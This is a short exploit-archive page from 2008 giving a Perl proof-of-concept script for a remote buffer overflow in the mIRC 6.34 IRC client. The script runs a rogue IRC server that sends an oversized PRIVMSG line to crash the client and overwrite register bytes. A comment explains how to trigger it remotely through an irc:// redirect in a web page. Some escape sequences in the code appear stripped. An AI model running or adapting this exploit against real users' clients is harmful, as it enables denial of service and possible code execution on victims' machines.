mIRC 6.34 Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : mIRC 6.34 Remote Buffer Overflow PoC
# Published : 2008-10-02
# Author : securfrog
# Previous Title : vxFtpSrv 2.0.3 CWD command Remote Buffer Overflow PoC
# Next Title : ESET SysInspector - 1.1.1.0 (esiadrv.sys) Proof of Concept Exploit

##################################################################################################
# Mirc 6.34 Remote Buffer Overflow
# 
# This poc allow you to own the 2 first EDI & EDX bytes.
# 
# To become remote, add a simple document.location.href=irc://server.com/... in some html page
#
use IO::Socket;

sub sock()
{
my $sock=new IO::Socket::INET (
Listen    => 1,
                                
LocalAddr => 'localhost',
                                
LocalPort => 6667,
                               
Proto     => 'tcp');  die unless $sock;

print " [+]IRC Server started on port 6667 rn";

$s=$sock->accept();  
$a = "A" x 313;
$twobytes = "x43x43";

print " [+]Sending picklesrn";
  
print $s ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yowrn"; 
sleep(1);
print $s ":".$a.$twobytes." PRIVMSG  yow : /FINGER yow.rn";
}
while(1)
{
sock();
print " [+]Mirc should be down now, another little friend comming ?rn [+]Server Restartingrn";
}

# www.Syue.com [2008-10-02]